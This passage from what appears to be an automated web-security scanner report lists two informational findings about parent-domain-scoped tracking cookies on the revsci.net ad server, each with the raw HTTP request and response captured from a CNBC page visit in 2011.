Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:13:44 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.157. http://pix04.revsci.net/I10985/b3/0/3/1008211/450083429.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/450083429.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBEq6kSbP3BW+WtxMJfXNIYt8JIvEV1nnjdZ/WZcKlAgNqH/8UCkWVUlX3IzKU4Rt4+5EdE6wRZEwMhtqkV8tVecrz8zYDPirBQcdZhw+eLiA+vKf8IaWxJPZ0zUN9N+mZU45BtmrY1IhSHSQw8NLNwnCnp3GjAE5o+UShCE83doE5nPJB7rUvLssOKNIlrz9NOW8lII41Z0J/UMg+tZ6lcs2x2NN4=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:23:13 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/450083429.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QGSyspZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZVBYf4XW1pSfuKp6homnlrYgI1lp22zIsyNkdhnNKrDXFyf2BIJjwRtF66AS5NH6WeHi66QiBAbzuCfcTOvbS7pGUjONH+30I2ZuPpFFcJfLwMGBPKQaQeWilp3IbaUy4YHwwCQ54z6HyEJjii4lNh+z72sqS8+sc4nxiV6/ef0ICmGx5g7xCy4pMdlCvlXW9zmpmAaRe4AnwFVp3janDXi1hx/1AwyItq6cJ/DahrGn/8I2DqZtPPL4L8ZvJCkkBlSEPLmp8X89FhkTc3FX0EkoMV5wb2GKZrUAz9ZSnPla73H20hG6GDVAIlzGqD+HVKrdZtLEidm93t8ba3/QY0qP1/RHB/bhABQqsC6PjuYiHsXCMVouXiWpLwM6qBXnbGGg1JT67wrbW+ySU7rogmEORPk7UwTymoz+IRwvFYky4FsOTLudHmb5jo8Y3+ZIgNcVdvXBaNNw=; rsiPus_mnCe="MLsXtSMNJyhvJZH0ecXcxPALrEtuUCF+UoWp6s1T5naB64mAw0+Om2ozfWioJheIF3IkbvZ3v4x1sIAzWnsKdaJpq/vgMjbw+g/R+QuypqizfE16Uce2VLD5TsZSrmbAXqvyAnZQkV7lU/B2MOKFUykKvrpRcmF0nJyAn4IIsp6axal9cdE0iM6kvyrTPZwrzZhCdIccLNNK9b3I+P/JA6emrwn3x9lzQsgxUwDwnSZiyIDfRixOuMgTtS9eEfC8DaaAkhOzgNrjemO1lidpHV6HIfp3leUu4b5M8cYnSkek1SKfOV1eqb3PnfaOLKpYxOQu9as3XguyhkPwv85Ds/yEx3+fwr11VE0Syq4g060UbR5Hnfgk8ntSGfCbA1bvImR4oMFsg1ZBh+zhArvkuAUmdGiJU8i7uGF49tl2BbEr36PSn5ZDLFSQmVp1QDhdJjyYiXHTVxrlNbLp4G3n+Ps12/RycRjIyXlaSxSwxbErqNJQIm1vX3k4pslpjXPwpkZKa8UgsDgAlrAEYeH+mA63wzK6YVPIefOLv4YHvKUD6sm3WqPUOJmJYa/5j9qAO/6qPhIV08o1PzPlW5viNIlhQ7PPYn399GI9CUhqvxMUlS+r/73wrpc0lmEUn7v07kwVSZpovA6+wc6SwvClo/GZfyNW/lwbscnXrWdg703McJvPvQ64k9vwOYeI/FqmvfuMe0BK+YAn90+aXwmKAgq/0DCl4p4zWWBVlB+Va4RxED5XVIVfh6WZLmqlnfWuL8s6YWf/EnNOje6OG38KHwzwYx3rMcUjQsvGafhOGR3wHFWQgDto4o1SSOi5B/4O35HXpOZsUxrMwXkMqsgMj+rhoWhDTczKAv42VUP82pBmxbEz+mZ4xlvd3QQO5wmuwhSx5aN7JyT5JL1IDDctLTqO+tGo5TLMUw/TdkGl3cSN64sIHYyCi9LrsemC5SagFmTQPfZZHjkh6sjeuIo4GjYIReqmyZc408c//OQRKJwqwR0djVs1fAvuoyR4pY4/GF9/+ozCKBuTCgzal/5tIW/LW/sETsjo+KerLIjA7VFuyklcaqk+Ol06pEhyE0jF8BZ7PE8mtpgsVsxFFP0cke/rUIOPi+mTmqiT5pBEyUrBMrPnScUeY+ZT/sE11nyh7HE2hSa4rQ1CKO+QBvHDfuHcALPX4CN2XDjk7KL1npr68jRmWh/xm0Tq0NUwfXSXJEvPLTh1iF396zoHxn4Oqqy5uOk/8yj8NxZjIcH1V6QDefRn2VQao8vQXKXa+rk4lkuEPRtiUSl65hzMxRy0LnH45T2N2mluH0TaJQnnlZwjx6TMv8hJQ2FobizAMvUvxLEA+spNb7jf+5k6auD4Uw=="; rsi_us_1000000="pUM14zlDOBYUrmdq3jOQH6NG/UTjJLypNPMu8j89fd7oQaFd0CGE6g8BwU8BLTkNk43VN7eq0cNInr6DAfiz0RNwYwaIJhBN2qEvfY1PNJcxRBwAtjfuDg4v2Zb/CmA/LOUc/ZtDPiBl4aVM/urnwSlvQouxNHv6znH/NBAeKyDnod5MJ13/kTXmq+qfmwuEyq1OxbDGt+ug/0tb8YseESAJs/2PeMKDRbCVN9dJPmbhofeHJq8pXa2pXtol/pJfhCS8smjRs9/r9sg+0PDARBp/XAycpZ+vXP/mBOeWvvTung+4wYAWHmo2djEIeA/LD83M539uOFLC8jCa/yO7psLGktaFG+RjjFz4ymMhK0SsjdFfLbBfUs0oZu5yWqNbU9yOOXYIB1wo+bL169eF4cp5T33/v/4l3SU0RILcjJ8N/CKBKGbM8uT55FXdlPhrAW7U0Qsf08f6JRbM3sVbd3818CV2K5Cm6mwaIon+RUsVdfbZSYGzHLZAK5UUrcemj2T85hGfuilfxuv24y1e9jWnKLAFXtGNKaRrRLTqwb709t+grBW1yfB8cT4z84z8Sgj7edmsUsMbrLvgsB9WF5ocgmAB223/BXPCf0lE/pofFLYYzSwMBDDLeIJ+myPTWP12UajXLQXKl24httnjvWc/jqvNB7QNbBQ3gngKOwNE+eO1/YrNSuD6fJ6V/6j0tNTKi/cwZkR5fMSwbDsbQWdFi8i2R73pvR2aPAjdiuU79i2+ijSKIE9ohEJKW0taeSJjeFseA9R7TjFUSQwRpwjDOaJ3AH0iB3NBxJvTw4gstV0us+h+W67+HccXMXxsCIJcU7djSF9tENxgnnFTolD3UAytN9+RtR3HqMUf5VtTLMhKOBPVf8Z+FmEk2AL/L3cu3refy19CDjC2pBjXb7lcdy6TyqGZ5PqfEGdLOWKS6fmcOllm5J/YtnuCFNaCZ58xdIja36W6N5/1qFuDSIs/J54Da6lF5QRPwMJAWnTVxr3+zblBEirGOojPTGV1H4IF7yQNQBhs69wz+3WwqVVXr7S1rIoRdsDaqUBF9slrgno6I99CTuxLF8N36zdMgbD8by1aqOgWBP6JWLmRtySptC4RDwjwAJdDnfcVqC1sxH51KTWaBxeYEzWUnTAmJ6396tnMeOXnDv/5auPp8MZMDABKWEmTAt6Qwo4Aqb6ocqmZtRvIwKdHbXFsUJUvUWKalYhrg1XjC4ivRiJtcvljbeD3F+d/ghQcDNkmszQ7wgR8BX4FWoJG8jI/hWI3IZLZeEcc/KFRNUVj5hijxlkYhsyG2gaGyvIvhDplS1VjgU4S2E3l39ZDm4lNxIh2JdJ84hGbbyr78C7Fft5x5fTiahpDsH4M1rO3dtnOJpEgiAyZfMbksLjjc3/fAQbEcxoVCWrKFi6qPXJ8DUGB5KWmlFDQ7f6lj7uZcUF7ym3k4XDfCfhiLoGKIap0gp5lgq59x5erWFveCxJ2WHGqTNeIfvwB735uiQ+CRcpd8ElZWAGnIjsm9LKZOwHHU/xUk7MiQxYlGywqZESPJTKMOnsQ397MElgrNk6Qx6wvqJNbNEJFxT5Y/4NWf8iSYfz7VTJuwAmWenMATnfHgtnUFcLvwlFtP0k+DXnAT1pQfrUHhbf/1QUaC+arhQ/u3ZPoyHrvaLvLFt23m3ea2S9Yl9wQvRbXZz3L8eg4eOY6AeXEYKT6KIngQU6J09kQIqDKqZF7UzttfyCY9feb9yUWNv1G5d9wiaXW8l7fT9+ZKDX6J7Y+veuCv02vbz+5"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBEq6kSbP3BW+WtxMJfXNIYt8JIvEV1nnjdZ/WZcKlAgNqH/8UCkWVUlX3IzKU4Rt4+5EdE6wRZEwMhtqkV8tVecrz8zYDPirBQcdZhw+eLiA+vKf8IaWxJPZ0zUN9N+mZU45BtmrY1IhSHSQw8NLNwnCnp3GjAE5o+UShCE83doE5nPJB7rUvLssOKNIlrz9NOW8lII41Z0J/UMg+tZ6lcs2x2NN4=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:23:13 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 16:23:12 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.158. http://pix04.revsci.net/I10985/b3/0/3/1008211/469061960.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/469061960.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88Dt+Xr5SMrCaDesP2v1b0OTJJ0SaxGkI/wp7+XJEJqbjRJx9w5bfXe8nwj2VXUacosCwLh4HW1pafBXtBaZ69LF3vwwNiRMOzM2hOzmIl3bkaNEsVIwrzqhtzkLb98whI1TyAiX4VXsMfxBwvwOTN3uNPwEJsPabBxQwHPp5/46LiCCA90/UyINB+lOenc2oXZx7bfxHZuTwOyjdiRgJsP1sXbC6eUwGWzLguW6SsMTBCG1D23QVRFUKOWM85CnTNYMCNXq3or7XEg8u2vvx0Y2vYif8fLD6jUtG/lMREU8yW7iI0DLsTrIFCkrm1kp+7NKotVmC6B0xoih8KOY2GgoDUHMLaF6Bd63X2lVVR6H9spRjI4FbNogsnrmd1Nb6qpiEPnmtStnvPL+ZHYhTdMJWQMP4bJ8NI8lb3ZqPJL0VV4AxaiAwL6eGmV5A9TFGc/tmK2wU5BZe4fCR0Dgju8cK4XB6lERNTZXxfcBhrADJYkSt7Dm6t76rF7GLRUdrdKIeG1Q3xoHA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:53:23 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/469061960.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg